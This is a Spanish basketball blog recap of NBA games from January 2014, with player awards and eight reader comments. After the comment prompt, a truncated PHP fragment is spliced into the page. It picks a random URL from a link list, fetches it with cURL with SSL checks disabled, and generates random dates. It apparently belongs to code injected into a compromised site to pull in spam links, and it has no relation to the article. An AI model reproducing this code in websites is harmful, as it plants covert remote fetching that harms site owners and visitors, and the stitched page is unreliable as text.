La Crónica: Nets sí, Knicks no, Rockets sí y no

17 de January de 2014 por TheDeerHunter

Impresionante jornada europea para los Nets que ganaron a los Hawks en el O2 Arena de Londres mostrando el mejor nivel de juego de todo el curso hasta el momento. Con la victoria se consolidan en plaza de playoff y empiezan ya a atisbar objetivos más ambiciosos.  Anotó Korver el triple que necesitaba para mantener una de esas rachas que pueden dañar el rendimiento de todo un equipo, pero fueron los jugadores de Brooklyn los protagonistas absolutss del partido. Dos jugadores siempre discutidos como Joe Johnson y Andray Blatche cuajaron fenomenales actuaciones y los veteranos Paul Pierce y Kevin Garnett aportaron lo que se espera de ellos en todo momento . Cosita fina para un total de 127 puntos sin prórrogas que no habían sido ni remótamente habituales en el grupo de Kidd hasta ahora (127-110).

Por su parte los Knicks perdieron y sufrieron además lesiones significativas. Tanto Kenyon Martin como Amare Stoudemire terminaron el partido con molestias preocupantes en sus respectivos tobillos izquierdos. Paul George y Carmelo Anthony firmaban las tablas en su duelo de alto estánding, pero era Lance Stephenson quien marcaba la diferencia en esta ocasión (89-117). La diferencia entre ambos equipos es abismal en estos momentos.

En Houston, los locales se marcaron un partido que entrará en los anales de la historia pero no de manera positiva. Tras anotar 73 puntos en la primera parte (la mejor marca de esta temporada por parte de cualquier equipo), los Rockets se quedaron en 19 en toda la segunda. 19. La segunda peor marca de toda la historia. Evidentemente, esos 54 puntos de diferencia entre una parte y otra suponen un nuevo récord histórico. Un dato que demuestra la magntiud del colapso: en la primera parte Houston anotó 12 de los 20 triples que intentaron. En la segunda parte fallaron hasta 14 intentos. Los invitados de lujo a esta montaña rusa fueron los Thunder que de la mano de Durant e Ibaka se impusieron para mantener así el ritmo de la conferencia (104-92). 

PREMIOS

MVP: Cuando aparece Joe Johnson lo hace de verdad, nada de medias tintas. 29 puntos (11 de 15 en TC, 6 de 8 en T3), 4 rebotes y 5 asistencias para el jugador de los Nets. Serge Ibaka y Kevin Durant dominaron a los Rockets, sobretodo en la segunda parte. 21 puntos, 15 rebotes y 5 tapones para el primero y 36 puntos y 7 asistencias para el segundo.

Rookie: Pero Antic disfruta de más tiempo de juego tras la lesión de Horford y lo aprovecha como en el partido de ayer. 11 puntos, 5 rebotes y 1 robo en 23 minutos.

Sorpresa: Exhibición de Andray Blatche saliendo desde el banquillo. Acabó el partido con 20 puntos, 14 rebotes y 6 asistencias. Seguro que todos le perdonamos las 5 pérdidas.

Decepción: Lo mejor para Kyle Korver y los Hawks es que vaya finalizando su racha de triples anotados en partidos consecutivos. Si noo, puede pasar que actuaciones como la de ayer (1 de 8 en triples) se conviertan en habituales.

Esfuerzo en vano: Podríamos destacar el de Carmelo Anthony (28 puntos y 7 rebotes) pero también el de Terrence Jones que con 16 puntos, 13 rebotes, 3 asistencias, 2 robos y 1 tapón fue el mejor de los suyos.

Imágenes | AP Photos / Getty Images

Comenta

8 comentarios a esta entrada

  1. Blade Petrovic dice:
    #1

    Sorpresa Shelvin Mack que consdiguió su career high con 17 puntos, además sin ser en los minutos de la basura

      Citar

  2. The wolf dice:
    #2

    El twitter de los Houston Rockets despues del partido: “First half = Godfather 1 & 2. Second half = Godfather 3.”

      Citar

  3. Denise dice:
    #3

    Si a Blatche le saliese de los huevos, ofensivamente sería el mejor ala pivot del mundo actualmente. Alá, ya lo he dicho y me he quedado a gusto.

    Teniendo en cuenta el bajo nivel del este, me da que en el All Star, los Heat, Pacers y los Nets van a reunir a 9 de los 12 jugadores convocados. Los de Heat y Pacers merecidos, los de los Nets basicamente por nombre Y del resto de equipos, Melo seguro y despues quizas gente como De Rozan, Wall, Kemba Walker, Drummond ó Carter-Williams. A Josh Smith y Irving personalmente no los llevaría, pero por nombre quizas acudan tambien.

    Esta noche hay un Boston-Lakers, ¿podría ser éste el peor partido de la historia entre ellos?

      Citar

  4. rumbero dice:
    #4

    Denise:
    Si a Blatche le saliese de los huevos, ofensivamente sería el mejor ala pivot del mundo actualmente. Alá, ya lo he dicho y me he quedado a gusto.

    Teniendo en cuenta el bajo nivel del este, me da que en el All Star, los Heat, Pacers y los Nets van a reunir a 9 de los 12 jugadores convocados. Los de Heat y Pacers merecidos, los de los Nets basicamente por nombreY del resto de equipos, Melo seguro y despues quizas gente como De Rozan, Wall, Kemba Walker, Drummond ó Carter-Williams. A Josh Smith y Irving personalmente no los llevaría, pero por nombre quizas acudan tambien.

    Si Josh Smith no iba nunca en su época de los Hawks dudo mucho que vaya ahora con la temporada que se está marcando. Irving va seguro. De hecho creo que en las últimas votaciones salía que el quinteto titular del este era: Irving – Wade – George – Carmelo – Lebron. Con esto de meter a todo dios en el Frontcourt vamos a ver a James saltando con Howard. Lo normal.

    Genial el tweet de los Rockets… y tomo nota de lo de Blatche.

      Citar

  5. Denise dice:
    #5

    The wolf:
    El twitter de los Houston Rockets despues del partido: “First half = Godfather 1 & 2. Second half = Godfather 3.”

    Cinefilos…no pillo bien el chiste… ¿el Padrino 3 es una mierda? Ni idea, no he visto ninguna.

    A todo esto, debatiamos si Griffin es un segunda espada para un equipo con aspiraciones de anillo, y digo yo….¿lo es el Dwight Howard actual? Cada vez creo que domina menos, cierto es que tiene a veces partizados , pero oye..tambien los tiene muchos otros centers y cobran menos y tienen menos ruidos mediaticos.

    Txusma, en la Hoops tienes 3 trades mios.

      Citar

  6. The wolf dice:
    #6

    Denise: Cinefilos…no pillo bien el chiste… ¿el Padrino 3 es una mierda? Ni idea, no he visto ninguna.

    Para el que lleva el twitter de los Rockets parece ser que si xD… a mi me parece algo peor pero no para tanto

      Citar

  7. Txusma dice:
    #7

    Denise:

    Txusma, en la Hoops tienes 3 trades mios.

    Vistos. En el foro de allí te comento pq los rechazo.

      Citar

  8. rumbero dice:
    #8

    Denise: Cinefilos…no pillo bien el chiste… ¿el Padrino 3 es una mierda? Ni idea, no he visto ninguna.

    A todo esto, debatiamos si Griffin es un segunda espada para un equipo con aspiraciones de anillo, y digo yo….¿lo es el Dwight Howard actual? Cada vez creo que domina menos, cierto es que tiene a veces partizados , pero oye..tambien los tiene muchos otros centers y cobran menos y tienen menos ruidos mediaticos.
    Txusma, en la Hoops tienes 3 trades mios.

    Es más que la coña está bien encontrada que lo mala que sea la peli. La única mierda del Padrino III es la interpretación de Sofia Coppola. El problema que tiene es que siendo buena está bastante lejos de las dos primeras partes, que son obras maestras sólo comparables a Kazaam.

    Y lo de Howard…pues la sensaciones que me deja las veces que lo he visto es que está lejos de su mejor versión de Orlando, aunque igual sólo es un tema de actitud. Luego te vas a los números y sigue siendo de lo mejor que te puedes encontrar. Yo a este quiero verlo en PO…
    Lo más dominantes que se le he visto esta temporada es esto

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>